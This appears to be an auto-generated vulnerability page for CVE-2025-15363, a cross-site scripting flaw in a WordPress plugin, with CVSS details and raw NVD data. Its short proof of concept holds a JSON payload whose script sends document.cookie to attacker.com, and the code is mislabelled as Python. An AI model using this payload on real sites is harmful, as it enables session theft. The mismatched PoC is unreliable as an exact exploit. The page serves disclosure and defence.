Security Vulnerability Report
中文
CVE-2025-15363 CVSS 5.9 MEDIUM

CVE-2025-15363

Published: 2026-03-18 07:16:21
Last Modified: 2026-04-15 15:05:48

Description

The Get Use APIs WordPress plugin before 2.0.10 executes imported JSON, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks under certain server configurations.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Get Use APIs WordPress Plugin < 2.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-15363 PoC - Malicious JSON for XSS // This PoC demonstrates the XSS vulnerability in Get Use APIs plugin < 2.0.10 // Attack requires contributor role or higher const maliciousPayload = { "name": "Test API", "endpoint": "javascript:alert(document.cookie)", "data": { "script": "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" } }; // Export this JSON and import via plugin's import functionality console.log(JSON.stringify(maliciousPayload, null, 2)); // Alternative: Direct import via API endpoint (if available) /* POST /wp-admin/admin-ajax.php Action: get_use_apis_import File: [malicious JSON file] */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15363", "sourceIdentifier": "[email protected]", "published": "2026-03-18T07:16:21.187", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Get Use APIs WordPress plugin before 2.0.10 executes imported JSON, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks under certain server configurations."}, {"lang": "es", "value": "El plugin de WordPress Get Use APIs anterior a la versión 2.0.10 ejecuta JSON importado, lo que podría permitir a usuarios con un rol tan bajo como el de colaborador realizar ataques de cross-site scripting bajo ciertas configuraciones de servidor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wpscan.com/vulnerability/428d08bb-5329-4406-a785-131bae4ed085/", "source": "[email protected]"}]}}